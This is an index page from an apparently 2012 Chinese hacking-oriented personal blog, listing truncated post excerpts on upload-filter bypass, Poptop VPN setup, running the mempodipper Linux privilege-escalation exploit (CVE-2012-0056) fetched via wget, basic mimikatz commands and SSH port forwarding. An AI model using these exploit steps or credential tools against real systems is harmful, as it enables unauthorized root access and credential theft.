Faust的博客

倾世元禳

2012-3-15 23:14:25 阅读43 评论0 152012/03 Mar15

上传漏洞可谓是网站入侵者最喜欢，最乐意的攻击手法，正因如此，程序员对上传文件的扩展名过滤，也是绞尽脑汁，从以前的黑名单过滤，通过判断扩展名是否为.asp,.asa,.cer等，到现在白名单直接判断扩展名是否为 jpg,gif,png,rar,zip等，甚至以前常用的00截断上传很多情况也不起作用了，但这并不意味着上传漏洞就已无用武之地，当你看到服务器的目录解析和文件解析问题后，上传也可谓是峰回路转了一回。

作者 | 2012-3-15 23:14:25 | 阅读(43) |评论(0) | 阅读全文>>

linux安装vpn

2012-3-15 11:00:33 阅读28 评论0 152012/03 Mar15

转载自http://lionnle.blog.51cto.com/362087/526069

Poptop简介
Poptop，官方网站上的定义是The PPTP Server for Linux，就是利用PPTP（Point to Point Tunneling Protocol，点到点隧道协议）通过Internet访问VPN（Virtual Private Network，虚拟局域网），它允许远程用户安全、花费低廉地从Internet上的任何地方访问公司内部网络。
依据连接方式划分，VPN可以分为Lan to Lan模式和client to Lan模式两种。前者可以将两个彼此独

作者 | 2012-3-15 11:00:33 | 阅读(28) |评论(0) | 阅读全文>>

Linux 2.6.39 到 3.2.0 提权漏洞利用

2012-3-8 17:20:29 阅读48 评论0 82012/03 Mar8

1.下载漏洞利用文件

wget http://git.zx2c4.com/CVE-2012-0056/plain/mempodipper.c

2.编译

gcc mempodipper.c -o mempodipper

3.执行前察看

    netcat@netcat:~$ uname -r
    3.0.0-12-generic
    netcat@netcat:~$ cat /etc/issue
    Ubuntu 11.10 n l

    netcat@netcat:~$ uname -a

作者 | 2012-3-8 17:20:29 | 阅读(48) |评论(0) | 阅读全文>>

神器mimikatz使用命令方法总结

2012-3-3 21:03:56 阅读102 评论0 32012/03 Mar3

mimikatz是法国的一位神牛写的神器,该神器有很强大的功能,据说已经被集成在metasplo

1.常规的操作使用命令

mimikatz # cls -->清屏,类似dos命令cls.

mimikatz # exit -->退出mimikatz.

mimikatz #version -->查看当前的mimikatz的版本.

随便输入"xxx::"，会提示"modules:'xxx' intr0uvable",大概意思就是你输入的命令不存在，然后会列出所有可用的命令

作者 | 2012-3-3 21:03:56 | 阅读(102) |评论(0) | 阅读全文>>

ssh 端口转发操作速记

2012-2-29 10:17:50 阅读61 评论0 292012/02 Feb29

ssh转发
第一部分--->
为Linux操作系统。
比如说我的机器是A，中间服务器为B，目标服务器是C。
从A可以ssh到B，从B可以ssh到C，但是A不能直接ssh到C。
现在展示利用ssh通道技术从A直接传输文件到C。
1. ssh -L1234:C:22 root@B
input B's password
2. scp -P1234 filename root@localhost:
input C's password

第二部分--->
ssh 是有端口转发功能的。
ssh的三个强大的端口转发命令：

QUOTE:
ssh -C -f -N -g -L listen_port:DST_Host:DST_port user@Tunnel_Host
ssh -C -f